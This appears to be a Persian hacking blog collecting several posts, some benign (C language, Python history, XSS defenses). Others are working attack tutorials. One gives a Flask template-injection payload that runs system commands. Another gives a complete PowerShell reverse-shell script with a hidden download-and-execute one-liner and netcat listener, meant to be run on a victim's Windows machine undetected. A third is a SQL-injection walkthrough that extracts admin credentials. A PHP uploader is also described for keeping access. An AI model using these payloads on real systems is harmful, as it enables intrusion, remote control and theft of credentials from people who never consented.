سلام دوستان امیدوارم حالتون خوش .امروز اومدم با یه باگ از یه میکروفریمورک پایتون که خیلی هم خطرناک و ترسناکه.این باگ اسمش ssti هستش و کارش اینه که وقتی برنامه نویس هیچ محدودیتی برای سرچ خود نزاشته شما باید بیاین و از اون استفاده کنین و به فایل های سرور دسترسی پیدا کنین.خب برای شروع کار باید اول دو payload ساده رو چک کنیم:http://site.com/search=http://site.com/?search=http://site.com/search=http://site.com/?search=در صورت دارا بودن باگ xss میایم تست بعدی رو انجام میدیم.اما چرا باید اول بفهمیم xss داره یا ن؟خب باید ببینیم که ورودی های get رو فیلتر کردن یا نه اگه نبود payload های بعدیمونو ارسال کنیم.اگه این مرحله رو رد کردین یه کار باحال دیگه باید انجام بدین و اونم اجرا دستورات flask بر روی سرور:http://site.com/search={{7*7}}http://site.com/?search={{7*7}}اگه برامون 49 رو چا‍پ کرد میریم سر یه کار مخربانه و اونم اضافه کردن payload زیر هستش:http://site.com/search={{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}اما این paylaod بالا برای چیه؟دوستان این تیکه کد میتونه بما اجازه اجرا دستورات سیستمی رو بده اما شما برای دسترسی به کانفیگ سیستم فقط فقط کافیه این عبارت رو تایپ کنید:http://site.com/search={{config.items()}}دوستان شاد و خرم باشید و از این باگ به عنوان یه انسان خوب استفاده کنین نه یه ......به امید روز های خوش و اینترنت آزاد . https://virgool.io/@LocalHost/%DA%AF%D8%B1%D9%81%D8%AA%D9%86-%D8%AF%D8%B3%D8%AA%D8%B1%D8%B3%DB%8C-%D8%A7%D8%B2-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-10-xtt4it7nqvyv https://coderlife.ir/%D8%B3%D8%A7%D8%AE%D8%AA-%DB%8C%DA%A9-%D8%A2%D9%BE%D9%84%D9%88%D8%AF%D8%B1-%D8%B3%D8%A7%D8%AF%D9%87-%D8%A8%D8%B1%D8%A7-%D8%AF%D8%B3%D8%AA%D8%B1%D8%B3%DB%8C-%D8%B1%D8%A7%D8%AD%D8%AA-%D8%A7%D8%B2-%D9%87%D8%A7%D8%B3%D8%AA-dofkgjy85egt

گرفتن دسترسی از ویندوز 10

localho3t — Wed, 24 Feb 2021 10:39:23 +0330

سلام دوستان امیدوارم حالتون خوب باشه و سر کیف باشین.امروز یه آموزش براتون دارم (البته نه برای همه).برای پنتست های جوان و هکر های کلاه سفید ؛ یا شمایی که میخواین هکر با سواد و کار بلدی باشین.خب دوستان امروز ما به یه لابراتوار که توش یه لینوکس باشه و یه ویندوز باشه نیاز داریم.اول از همه باید یه وب سرور داشته باشیم که بتونیم توش یه کد پاور شل رو به txt قرار بدیم.من از nginx استفاده میکنم.پس میزنم : systemctl start nginxمن دبیان نسخه 10 استفاده میکنم.خب حالا تو پوشه :/var/www/html/ادیتور nano این کد رو اضافه میکنم:nano remote.txt // تو محیط نانو این کد رو میزنیم sfunction cleanup { if ($client.Connected -eq $true) {$client.Close()} if ($process.ExitCode -ne $null) {$process.Close()} exit} // Setup IPADDR $address = 'ایپی خودتونو بنویسین' // Setup PORT $port = 'پورت خودتونو بنویسین' $client = New-Object system.net.sockets.tcpclient $client.connect($address,$port) $stream = $client.GetStream() $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize $process = New-Object System.Diagnostics.Process $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $process.StartInfo.RedirectStandardInput = 1 $process.StartInfo.RedirectStandardOutput = 1 $process.StartInfo.UseShellExecute = 0 $process.Start() $inputstream = $process.StandardInput $outputstream = $process.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; $testing = 0; while (-not $done) { if ($client.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($networkbuffer,0,$pos) $inputstream.write($string) start-sleep 1 if ($process.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($outputstream.Read()) while($outputstream.Peek() -ne -1){ $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}و اما در ادامه .....این تیکه کد رو به تارگت خودمون میدیم و میگیم تا اجراش کنه (اون دیگه به عهده خودتون).powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString('http://your ip/remote.txt')"و قبل از اینکه اینو به کاربر بدین باید روی لینوکس خودتون پورت مورد نظر رو listen کنین:nc -nvlp و وقتی کاربر اجرا کنه شما دسترسی کامل دارین به دایرکتوری هاش.اینم بگم windows defender هم نمیتونه اینو شناسایی کنه.شاد و پیروز باشید دوستان.

جایگاه زبان c

localho3t — Thu, 21 Jan 2021 18:12:52 +0330

سلام دوستان امیدوارم حالتون خوب باشه.بالاخره بعد از کلی تاخیر دوباره برگشتم و میخوام قوی تر از قبل کار کنم.موضوع امروز ما جایگاه زبان c در دنیای برنامه نویسیه.باید بگم که اولا زبان c در بحث سرعت و قدرت حرف اول رو میزنه و اینم بگم که برنامه هایی که با زبان c کامپایل میشه خیلی خیلی سخت کرک میشه و حتی میشه گفت تو بعضی از مواقع غیر قابل کرک هستش.(بستگی به برنامه نویسش داره البته)اما تو یه سری از جاها واقعا استفاده از اون کار درستی نیست مثلا در نوشتن وب اسکریپت ها.شاید یه سری ها موضع بگیرن که چرا و اینا و .....بید بگم وب اسکریپت ها صرفا برای انالیز بکار میره و یسری ادما کلاه سفید یا سیاهی مینویسن تا بتونن سایت های مردم رو چک کنن یا یه برنامه نویسی مینویسه که بتونه خبرا یا چیزای مختلفی رو بخونه.و اماااااااا مورد بعدی ماجاهایی مثل کار با دیاگ ماشین یا میکرو ها یا فایل های so و dll هایی که به ترتیب در اندروید یا .net بکار میره استفاده کرد.یا برا ادم بدا باید بگم کار بر روی بات نت ها و کرم ها و رات ها و غیره و غیره.چرا چون رقابت خیلی بالاست و نباید به سورس کد ها دست پیدا کنن.حتی مهمه که بگم بعضی وقتا حتی در حال حاضر مجبورن از زبان اسمبل و پایین تر از اون استفاده کنن.در کل امیدوارم براتون مفید واقع شده باشه.شاد و خندون باشید.

ساخت یک آپلودر ساده برا دسترسی راحت از هاست

localho3t — Tue, 19 May 2020 01:34:21 +0430

سلام به شما دوستای عزیز طبق معمول تیم امنیت TBS هیچ مسئولیتی در قبال استفاده نادرست شما نداره و از همه مهم تر این فقط جهت آموزش به شما دوستان عزیز ارائه داده میشود.موفق باشید.قبل از شروع این مقاله کوتاه ، تیم امنیتی TBS در حال بزرگتر شدن است و دوستداران هک و امنیت میتونن توی این گروه فعالیت کنن برای دیدن شرایط به ادرس :https://t.me/locallhost@locallhost در تلگرام ارتباط برقرار کنید.چرا از آپلودر استفاده میکنیم؟ببینید ما وقتی از یک ادمین پیج دسترسی میگیریم باید اول از همه ببینیم سایت مورد نظر از چه زبان یا فریمورکی استفاده میکنه و بعدش اقدام به نوشتن آپلودر کنین.ما در این آموزش آپلودر خودمون رو با زبان php مینویسیم چون بیشتر وب سایت ها با این زبان اداره میشن.خب اول از همه ما باید یک فرمی درست کنیم بدون action و ترجیحا با متد post: و این فایل رو اپلود میکنیم و یک فایلی به اسم دلخواه ما آپلود میکنه و میتونیم خیلی راحت دسترسی خودمون رو کامل تر کنیم.با تشکر تیم امنیتی TBS

باگی خطرناک به اسم Sql Injection

localho3t — Mon, 18 May 2020 23:23:38 +0430

قبل از اشتراک این مقاله باید بگم مسئولیت این آموزش بر عهده خود فرده و تیم امنیتی TBS هیچ مسئولیتی رو قبول نمیکنه.دوما این مقاله خیلی خیلی ابتدائیه و روی هر وبسایتی جواب نمیده.سوما من وقتی این باگ رو شروع کردم روزی 4 ساعت فقط به صورتی تذریق دستی میکردم.و در اخر اگه میخواین توی این باگ حرفه ای بشین باید کلی تحقیق کنین و این آموزش در مورد حمله به صورت Union Base هست و در ادامه ما بقی حالات تذریق رو شرح میدیم.مراحل تست نفوذ Sql Injectionبا عرض سلام و درود خدمتشما عزیزان ، به واسطه آسیب پذیری SQL Injection میتوان با تزریق دستورات SQL به ورودی هایی که به پایگاه داده اعمال میشود، اطلاعات مورد نظر را از پایگاه داده استخراج و اهداف خود را روی آن هدف اعمال کرد. در این مقاله به توضیح کامل تست نفوذ sql injection خواهیم پرداخت.برای این کار ما میتونیم از نرم افزارهای موجود نیز استفاده کنیم که از جمله قوی ترین اون ها میشه به نرم افزار هویج یا sqlmap اشاره کرد. ولی یک پنتستر حرفه ای همیشه سعی میکنه تمامی مراحل رو خودش به صورت دستی یاد بگیره و بدون نرم افزار هم بتونه کارهاش رو انجام بده.در این پست ما با پایگاه داده mysql کار میکنیم.مراحل تست نفوذ:تست آسیب پذیر بودن وب سایتاستخراج ستون های آسیب پذیراستخراج جداول پایگاه دادهانتخاب جدول مورد نظراستخراج اطلاعات از جدول انتخاب شدهتست آسیب پذیر بودن وب سایتبرای تست این آسیب پذیری از تک کوتیشن ‘ استفاده میکنیم که در جواب، اگر از طرف وب سایت تارگت، با ارور mysql() مواجه شدیم پس میتوانیم بگوییم که وب سایت اسیب پذیر است. دقت کنید که ناقص لو شدن سایت یا بالا نیومدن کامل سایت هم نشانه باگ sqli هست.www.site.com/test.php?id=1برای مثال اگر ما به ادرس بالا تک کوتیشن اضافه کنیم، سایت برای ما ارور میده یا ناقص لود میشه یا اصلا بالا نمیاد یا اینکه کامل لود میشه که این یعنی سایت باگ نداره.www.site.com/test.php?id=1'استخراج ستون های آسیب پذیربعد از اینکه تشخیص دادیم یک وب سایت باگ SQL داره باید از طریق دستوراتی ستون های آسیب پذیر اون رو استخراج کنیم. در ادامه یاد میگیرید که چگونه ستون های اسیب پذیر یک وب سایت رو پیدا کنید.برای این کار از دستور order by استفاده می‌کنیم. دستور order by برای مرتب کردن اطلاعات دریافتی از پایگاه داده مورد استفاده programmerها قرار می‌گیره، وقتی عددی بالاتر از تعداد ستون‌های پایگاه داده با دستور order by درخواست بدهیم، صفحه وب سایت جاری با مشکل اجرا میشه.وقتی یک صفحه آسیب پذیر در سایتی پیدا کردیم به انتهای آن دستور order by اضافه می‌کنیم تا بتونیم تعداد ستون‌های جدول مورد نظر رو پیدا کنیم. روش استفاده از این دستور به صورت زیر است:site.com/news.php?id=10+order+by+20--در دستورات بالا از + به جای فاصله و از -- برای اعلام پایان دستورات استفاده می‌شود، عددی که در انتهای دستورات وجود داره تعداد ستون‌های جدول است که باید آن قدر آن را امتحان کنیم که به تعداد ستون درست جدول برسیم.تعداد ستون جدول در صورتی درسته که صفحه بدون مشکل و به صورت کامل لود بشه. معمولا کار تست را از از عدد بزرگی شروع و در هر مرحله به نصف کاهش می‌دهیم تا تعداد ستون‌ها رو پیدا کنیم.استخراج جداول پایگاه دادهبرای این کار از دستور union select استفاده می کنیم.برای مثال ما با دستور order by فهمیدیم که وب سایت ۴ ستون آسیب پذیر داره پس دستور بعدی اینجوری میشه:www.site.com/test.php?id=1+union+select+1,2,3,4همچنین میتونید بجای + از فاصله استفاده کنید:www.site.com/test.php?id=1 union select 1,2,3,4خب حالا ما تونستیم تعداد ستون های آسیب پذیر رو به دست بیاریم. مثلا اگه ستون ۲ اسیب پذیر بود رو صفحه عدد ۲ رو برای ما نشون میده.نکته: برخی مواقع دستورات ما کار نمیکنند که امکان داره از طرف وب سایت سیاست های امنیتی برای جلوگیری از هک شدن سایت اعمال شده است. برای درست کار کردن دستوراتمون باید بایپس هایی رو بر روی وب سایت انجام بدیم. برای مثال باید یک دش(-) به پشت دستور اضافه کنیم تا ستون هارو برامون نشون بده. به صورت زیر:www.site.com/test.php?id=-1+union+select+1,2,3,4همون طور که دستور بالا رو میبینید علامت دش در url بعد از =id گذاشته شده است.به دست اوردن ورژن php و نام دیتابیسخب ما تونستیم ستون های اسیب پذیر رو پیدا کنیم. حالا در ادامه آموزش، ما به فرض ستون شماره ۲ رو اسیب پذیر فرض کرده و تست میکنیم.با دستور زیر میتونیم ورژن php استفاده شده بر روی وب سایت رو به دست بیاریم.version()این دستور به صورت زیر به کار میره:www.site.com/test.php?id=-1+union+select+1,version(),3,4الان اگه به لینک بالا نگاه کنید متوجه میشید که به جای عدد ۲ که همون ستون آسیب پذیر ما بود، دستور version() رو وارد کردیم. که در نتیجه میتونید ورژن php را مشاهده کنید.نکته:تمامی دستوراتی که ما تا الان گفتیم برای ورژن های بالای ۵ است و برای ورژن های زیر ۵ قضیه کلا فرق داره. و تقریبا میشه گفت که الان همه ورژن هایی که استفاده میشن بالایی ۵ هستند و به ندرت ورژن زیر ۵ پیدا میشه.همچنین شما میتونید به جای دستور ()version از version@@ استفاده کنید که باز نتیجه یکی هست.www.site.com/test.php?id=-1+union+select+1,@@version,3,4برای به دست اوردن نام دیتابیس هم میتونیم از دستور database() استفاده کنیم.www.site.com/test.php?id=-1+union+select+1,database(),3,4انتخاب جدول مورد نظرخب در قسمت های قبلی یاد گرفتیم که چطوری تعداد ستون های آسیب پذیر رو پیدا کنیم. حالا در این قسمت جداول موجود در دیتابیس رو به دست میاریم. در ادامه آموزش ما ستون شماره ۳ رو آسیب پذیر فرض کردیم.در ادامه کار ما دستور (group_concat(table_name) رو به جای ستون مورد نظر وارد میکنیم.www.site.com/+union+select+1,2,group_concat(table_name),4,5همچنین دستور from information_schema.tables رو نیز مانند ادرس زیر به آخر ادرس اضافه میکنیم.www.site.com/+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tablesخب با این دستور تمامی جداول موجود برای ما نشون داده میشن که ما فقط جداول موجود در دیتابیس رو میخواییم که میتونیم دستور where table_schema=database() رو نیز به ادرس خود اضافه کنیم کهدستور ما به صورت زیر میشه:www.site.com/+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()الان دیگه میشه گفت که به تمام جداول موجود در پایگاه داده دسترسی داریم که حالا باید دنبال جدول مورد نظر خود بگردیم برای مثال جدول admin که یوزر و پسورد ادمین سایت در اون ذخیره شده است.نکته: از جمله اسم هایی که برای این جدول انتخاب میشه میتونیم به admin, login , users ,user ,tbladmin اشاره کنیم.البته همیشه به این اسم ها نیست ولی دونستنش خیلی خوبه چون توی اتک به ورژن 4 خیلی کمک میکنه.استخراج اطلاعات از جدول انتخاب شدهدر بخش قبلی ما جدول admin رو انتخاب کردیم که برای استخراج اطلاعات اون از دستور زیر استفاده میکنیم.www.site.com/+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='admin'همون طور که میبینید اسم table رو به column تغییر دادیم teble_schema رو هم به table_name تغییر دادیم حالا اطلاعات موجود در جدول برای ما نشون داده میشن. برای مثال: id,username,password,email. در ادامه برای بیرون کشیدن یوزرنیم و پسورد از دستوز زیر استفاده میکنیم:www.site.com/+union+select+1,2,group_concat(username,password),4,5+from+adminخب بعد از وارد کردن دستور بالا، برای مثال اگه یوزرنیم و پسورد به صورت admin ,admin باشه برای ما به صورت adminadmin نشون داده میشه. که برای اینکه باهم قاطی نشن، دستور هگز ۰x3a رو اضافه میکنیم که همون علامت (:) است.که نتیجه به صورت admin:admin برای ما نشون داده خواهد شد.البته امکان داره تمامی پسورد ها به صورت هش(Hash) در اومده باشن .من خودم از این آموزش شروع کرده بودم و امیدوارم خوشتون بیاد. سوالی دارین زیر همین پست بپرسین جواب میدم. https://kaliboys.com/sql-injection/

آشنایی با حملات XSS

localho3t — Sun, 17 May 2020 23:12:25 +0430

قبل از هر چیزی بگم که این فقط فقط جنبه آموزشی داره ومسئولیت استفاده نادرست از این مقاله بر عهده خود شخص می باشد و تیم امنیتی TBS هیچ مسئولیتی را قبول نمیکند.حملات Xss یا Cross Site Scriptingاین باگ (XSS) یکی از حملات تزریق به پایگاه داده است که در آن کدهای سمت کلاینت مانند جاوا اسکریپت به سایت تزریق شده و بدین وسیله هکرها خواهند توانست اطلاعات کاربران وب سایت مورد نظر را بدون اطلاع آنها سرقت کنند.بدین صورت که هکرها کدهای خود را جایگزین کدهای صفحات داینامیک سایت میکنند.هنگامیکه وب سایت از کاربر درخواست اطلاعات میکند ، کدهای جایگزین هکر بر روی سیستم کاربر اجرا شده و میتوانند اطلاعات مهم سیستم شخصی کاربران را سرقت کنند و هدف هکر بیشتر کاربرانی هستند که به سایت مراجعه کرده اند. در واقع هکرها در این نوع حمله اطلاعات کاربران یک سایت را بدون اینکه خودشان متوجه شوند، به سرقت میبرند..!اگرچه مخفف CSS ، Cross Site Scripting میباشد اما با توجه به اینکه CSS به عنوان مخفف Cascading Style Sheets به کار برده میشود، به همین دلیل از XSS برای مخفف Cross Site Scripting استفاده میشود.روش حملهبا طرح مثالی به شرح روش حمله میپردازیم. کاربری در وب سایت بانک خود وارد شده و اطلاعات کاربری خود را در صفحه لاگین وارد میکند. در صورتیکه وب سایت در برابر حمله XSS محافظت نشده باشد ، اطلاعات کاربر توسط هکر به سرقت رفته و میتواند از حساب بانکی کاربر استفاده سوء نماید. با وجود اینکه روش های مقابله با XSS اعمال شده است ولی باز هم تمامی وب سایت هایی که اطلاعات کاربران را دریافت میکنند ، مستعد این حملات هستند.ئدر این حمله با کلیک بر روی یک لینک در ایمیل ، کدی به صورت مخفی در سیستم کاربر اجرا شده و هکر با استفاده از این کد خواهد توانست اطلاعات سیستم کاربر را بدست آورد. همچنین یکی دیگر از روش های حمله بدین صورت هست که با دستیابی به کوکی هایی که وب سایت های مختلف برای ذخیره اطلاعات لاگین کاربران در سیستم وی ایجاد و ذخیره میکنند ، اطلاعات کاربران را سرقت میکنند.انواع حملات Xss :طراح سایت خودش کد مخرب را در صفحه قرار داده باشد.حفره امنیتی ممکن است در سطح سیستم عامل یا شبکه ایجاد شده باشد.یک حفره امنیتی همیشگی در قسمت های عمومی سایت قرار گرفته باشد.کاربر بر روی یک لینک حاوی XSS کلیک کند.کاربر ایمیل حاوی XSS را باز کند.با انجام حملات XSS موارد زیر در اختیار هکر قرار خواهد گرفت:تغيير تنظيمات كاربرربودن حسابهاربودن كوكی هااعمال كدهای تخریب کنندهلینک به سايت های مخربراه اندازی تبليغات كاذبروش های جلوگیری از XSSاضافه نمودن كدی به برنامه تحت وب است تا باعث شود از برخي تگ های فرمان در ورودی پويا چشم پوشی شود.تگ های قابل استفاده در XSS عبارتند از:

استفاده از مرورگرهای وب امن مانند Firefox و Opera که امنیت بالاتری نسبت به IE دارند. اینترنت اکسپلورر از جمله مرورگرهایی است که نقاط ضعف زیادی دارد و بسیار در معرض خطر است.بكارگيری ابزارهایی كه اجرای كدهای Script،Flash و هر کد مخرب دیگری را محدود مي كنند. مثل NoScriptبر روی لینک ها و ایمیل های ناشناس کلیک نکنید.سعی نمایید تا آدرس را مستقیما در نوار آدرس وارد کنید. و یا اینکه برای جلوگیری از این نوع حمله ایمیل را روی حالت Html یا متنی قرار دهید تا کدهای مخرب خود به خود اجرا نشوند.استفاده از توابعی که عملیات پاکسازی کدها را انجام می دهند. مثل htmlentities در زبان PHP (فیلتر نمودن ورودی های کاربر و همچنین کدهای خروجی)سعی کنید گزینه یادآوری نام کاربری و رمز عبور را در مرورگرهای خود غیر فعال کرده و به صورت دوره ای رمز عبور ایمیل های خود را تغییر دهید.بهتر است از یک ایمیل مجزا برای حساب های کاربری مهم خود مانند حساب بانکی و … استفاده کرده و از آن برای ارتباطات روزانه استفاده نکنید.متد‌های جلوگیری از حملات XSSروش اول: Escapingدر این روش اطلاعات ورودی توسط کاربر به نوعی سانسور می‌شوند. مثلا از ثبت بعضی از کارکتر‌های خاص مانند > و < که ممکن است در دستورات کد استفاده شوند جلوگیری می‌شود و باعث می‌شوند که کد‌های مخرب از کار بیفتند.اگر سایت شما به نوعی است که به کاربران اجازه اضافه کردن کد خود را نمی‌دهد، راه حل خوب می‌تواند escape کردن تمامی متون از جمله HTML, URL و Javascript باشد.ولی در صورتی که سایت از متون غنی‌(rich text) پشتیبانی می‌کند مانند سایت‌ها فروم و یا ثبت نظر‌ها، اجرای این روش کمی سخت تر می‌شود زیرا باید کاراکتر‌هایی که escape می‌شوند را به دقت انتخاب کنید.روش دوم:‌ اعتبار سنجی ورودی (Validating Input)اعتبار سنجی ورودی، پروسه‌ایست که در آن از اطلاعات ورودی به سایت و مرتبط بودن آن اطمینان حاصل می‌شود. با اعتبار سنجی درست می‌توان جلو ورود کد‌های مخرب به سایت را گرفت.در این روش کاربر اجازه ورود یک سری کاراکتر‌های خاص در فیلد‌های مربوط به خود را دارد. مثلا فیلد دریافت شماره تلفن، فقط باید اعداد را دریافت کند و اجازه ورود هر کاراکتری به جز عدد را ندهد.جمع بندیحملات XSS با اینکه می‌توانند برای هر سایتی بسیار خطرناک باشند و تمامی کاربران سایت را تحت حمله قرار دهند، به راحتی هم قابل پیشگیری هستند و حتی بسیاری ازین حملات در انواع هاست لینوکس و هاست وردپرس وب‌رمز توسط فایروال سرور بلاک میشوند. برای افزایش امنیت کافی است با استفاده از متد‌هایی که توضیح داده شد و یا ترکیب این متد‌ها با روش‌های دیگری که در مجمع‌های اینترنتی به وفور درباره آنها صحبت شده است، جلوی ورود کد‌ها و دستورات ناخواسته را به سایت گرفت تا از به وجود آمدن مشکلات خطرناک برای کاربران وب‌سایت شما جلوگیری شود.منابع https://webramz.com/blog/%D8%A2%D8%B4%D9%86%D8%A7%DB%8C%DB%8C-%D8%A8%D8%A7-%D8%AD%D9%85%D9%84%D8%A7%D8%AA-xss-%DB%8C%D8%A7-cross-site-scripting https://webdataco.com/blog/%D8%A2%D8%B4%D9%86%D8%A7%DB%8C%DB%8C-%D8%A8%D8%A7-%D8%AD%D9%85%D9%84%D8%A7%D8%AA-xss با تشکر از همراهی شما دوستان عزیز :|

خطرناک ترین باگ های امنیتی تحت وب

localho3t — Sun, 17 May 2020 22:05:28 +0430

داشتم توی اینترنت میچرخیدم که بالاخره به یه وبسایت رسیدم که چیزای باحالی توش بود.امیدوارم خوشتون اومده باشه.محدود کردن نادرست عملیات در Memory Bufferخنثی سازی نامناسب ورودی در طول تولید صفحه وب (xss)اعتبارسنجی ورودی نامناسب (Input Validation)قرار گرفتن در معرض اطلاعات (Information Exposure)خواندن در خارج از محدوده (Out-of-bounds Read)خنثی سازی نامناسب با عناصر ویژه مورد استفاده از دستور SQLاستفاده از After Freeاستفاده از Overflow or Wraparoundجعل درخواست متقابل سایت (CSRF)محدود کردن نامناسب یک مسیر برای یک فهرست محدود (Path Traversal)خلاصه برداری شده :)

زبان های واگیر دار (پایتون)-قسمت اول

localho3t — Thu, 30 Apr 2020 03:32:47 +0430

امیدوارم از این مقاله بهره لازم را ببرید D:چکیدهپایتون (به انگلیسی: Python) یک محیط یکپارچه توسعه نرم‌افزار تفسیری، همه منظوره، سطح بالا، شیءگرا،اِسکیریپتی و متن باز است که توسط خیدو فان روسوم در سال ۱۹۹۱ در کشور هلند طراحی شده است.فلسفهٔ ایجاد آن تأکید بر دو هدف اصلی خوانایی بالای برنامه‌های نوشته شده و کوتاهی و بازدهی نسبی بالای آن است. کلمات کلیدی و اصلی این زبان به صورت حداقلی تهیه شده‌اند و در مقابل کتابخانه‌هایی که در اختیار کاربر است بسیار وسیع هستند.بر خلاف برخی زبان‌های برنامه‌نویسی رایج دیگر که بلاک‌های کد در آکولاد تعریف می‌شوند (به‌ویژه زبان‌هایی که از گرامر زبان سیپیروی می‌کنند) در زبان پایتون از نویسه فاصله و جلو بردن متن برنامه برای مشخص کردن بلاک‌های کد استفاده می‌شود. به این معنی که تعدادی یکسان از نویسه فاصله در ابتدای سطرهای هر بلاک قرار می‌گیرند، و این تعداد در بلاک‌های کد درونی‌تر افزایش می‌یابد. بدین ترتیب بلاک‌های کد به صورت خودکار ظاهری مرتب دارند.پایتون مدل‌های مختلف برنامه‌نویسی (از جمله شی‌گرا و برنامه‌نویسی دستوری و تابع محور) را پشتیبانی می‌کند و برای مشخص کردن نوع متغیرها از یک سامانهٔ پویا استفاده می‌کند.این زبان از زبان‌های برنامه‌نویسی مفسر بوده و به صورت کامل یک زبان شیءگرا است که در ویژگی‌ها با زبان‌های تفسیری پرل،روبی، اسکیم، اسمال‌تاک و تی‌سی‌ال مشابهت دارد و از مدیریت خودکار حافظه استفاده می‌کند.پایتون پروژه‌ای آزاد و متن‌باز توسعه‌یافته‌است و توسط بنیاد نرم‌افزار پایتون مدیریت می‌گردد.تاریخچهمخترع زبان پایتون خودو فان روسومپایتون اواخر دهه ۱۹۸۰ (میلادی) توسط خودو فان روسوم در مؤسسه ملی تحقیقات ریاضی و رایانه (CWI) در کشور هلند ایجاد شد.هدف خَودو ایجاد جانشینی برای زبان برنامه‌نویسی ای‌بی‌سی بود که قابلیت پردازش استثناها را داشته باشد خَودو طراح اصلی پایتون است و نقش مداوم او در تصمیم‌گیری پیرامون اهداف پایتون، باعث شد که انجمن پایتون به او لقب دیکتاتور خیرخواه جاویدان را بدهد.نسخه‌های اولیهدر سال ۱۹۹۱ فان روسوم کدی با برچسب نسخه ۰٫۹٫۰ را منتشر کرد. البته در این مرحله از پیشرفت کلاس‌هایی با خاصیت ارث بری،پردازش استثنا، توابع و انواع داده list, dict, str وجود داشت. همچنین در این نسخه ابتدایی یک سیستم ماژول با اقتباس از ماژول-۳ وجود داشت، که فان روسوم این ماژول را به عنوان «یکی از واحدهای عمده برنامه‌نویسی پایتون» توصیف کرد. مدل استثناء پایتون نیز شباهت‌هایی به ماژول-۳ داشت، که به آن شرط else افزوده شده بود. در سال ۱۹۹۴ اولین مجمع مباحثه پیرامون پایتون شکل گرفت که مرحله برجسته‌ای در پیشرفت کاربری پایتون بود.نسخه ۱٫۰پایتون در ژانویه ۱۹۹۴ به نسخه ۱٫۰ رسید. خصوصیات عمده جدید این نسخه شامل ابزارهای برنامه‌نویسی تابعی lambda, map, filter, reduce بود.پایتون نسخه ۱٫۲ در سال ۱۹۹۵، زمانی‌که خَودو در CVVI بود، ارائه شد. خَودو به فعالیت‌های خود روی پایتون در مؤسسه ملی تحقیقات و ابتکارات (CNRI) در رستون ادامه داد و در همان‌جا چندین نسخه جدید انتشار یافت.در نسخه ۱٫۴ به پایتون چندین ویژگی جدید اضافه شد. از ویژگی‌های جالب توجه در میان این اضافات می‌توان به الهام گرفتن از آرگومان‌های کلیدی ماژول-۳ (که خود از آرگومان‌های کلیدی لیسپ الهام گرفته بود) و همچنین پشتیبانی اعداد مختلط اشاره کرد.در مدت فعالیت فان روسوم در CNRI، او پروژه «برنامه‌نویسی کامپیوتر برای هر کس» (CP4E) را ایجاد کرد تا برنامه‌نویسی را در دسترس افراد بیشتری که اطلاعات پایه‌ای برای برنامه‌نویسی (برای مثال توانایی در زبان انگلیسی و مهارت‌های اولیهٔ ریاضی) را دارند، قرار دهد. زبان برنامه‌نویسی پایتون به دلیل تمرکزش بر روی پاکسازی فرم دستوراتش، نقش مرکزی را ایفا کرد. این پروژه توسط دارپا سرمایه‌گذاری شد و از سال ۲۰۰۷ غیرفعال شد.متن باز و آزاد بودندر سال ۲۰۰۰ تیم توسعه دهنده پایتون به BeOpen.com منتقل شد و بدین صورت تیم کتابخانه باز پایتون شکل گرفت. به پیشنهاد CNRI ورژن ۱٫۶ساخته شد، بدین ترتیب برنامه‌های تولید شده برای ۱٫۶و ۲٫۰اشتراک‌های قابل توجهی داشتند. فقط پایتون ۲٫۰ توسط BeOpen.com طراحی شده بود. بعد از تولید پایتون ۲٫۰ توسط BeOpen.com، خَودو و دیگر توسعه دهندگان کتابخانه پایتون به ایجاد دیجیتال روی آوردند. تولید پایتون ۱٫۶ شامل جواز جدید CNRI بود که به‌طور قابل توجهی طولانی‌تر از جواز CWI (که برای تولیدات قبلی استفاده شده بود) بود. بنیاد نرم‌افزار آزاد توضیح داد که انتخاب شرط قانون با GNU GPL ناسازگار بود. , BeOpen CNRI و FSF تغییراتی را در جواز پایتون ایجاد کردند که با GPL سازگار باشد. پایتون ۱٫۶٫۱ عمدتاً مشابه پایتون ۱٫۶ است فقط با کمی اشکال، و با جواز سازگار با GPL.نسخه ۲٫۰پایتون ۲٫۰ فهرستی از ویژگی‌هایی را که از زبان‌های برنامه‌نویسی تابعی ستل و هسکل اقتباس شده بود، معرفی کرد. نحو پایتون برای این ساختار (جدا از برتری هسکل برای کاراکترهای نقطه‌گذاری و کلمات الفبا) بسیار مشابه هسکل بود. پایتون ۲٫۰ همچنین یک سیستم بازیافت حافظه با قابلیت جمع‌آوری منابع معرفی کرد. پایتون ۲٫۱ به پایتون ۱٫۶٫۱ و ۲٫۰ نزدیک بود. جواز آن به جواز مؤسسه نرم‌افزار پایتون تغییر نام یافت. همه کدها، اسناد و مشخصات اضافه شده را از زمان تولید الفبای پایتون ۲٫۱ توسط مؤسسه نرم‌افزار پایتون (PFS) دارا شد. یک سازمان غیرانتفاعی در سال ۲۰۰۱ تشکیل شد که از مؤسسه نرم‌افزار آپاچی مدل گرفته بود. تولیدات شامل تغییراتی در خصوصیات زبان در پوشش حوزه‌های تو در تو بود، مشابه دیگر زبان‌های حوزه‌ای ایستا. (این خصوصیات دوباره از بین رفتند و به پایتون ۲٫۲ منتقل نشدند) یک تغییر بزرگ در پایتون ۲٫۲ یکسان‌سازی انواع داده‌ای پایتون و کلاس‌ها به یک سلسله مراتب بود. این یکسان‌سازی اشیاء پایتون را کاملاً شیء گرا کرد.میراث جاواانتخاب نحو و ضمایم کتابخانه استاندارد پایتون شدیداً وابسته به بعضی موارد در جاوا بود: بسته logging در ورژن ۲٫۳، 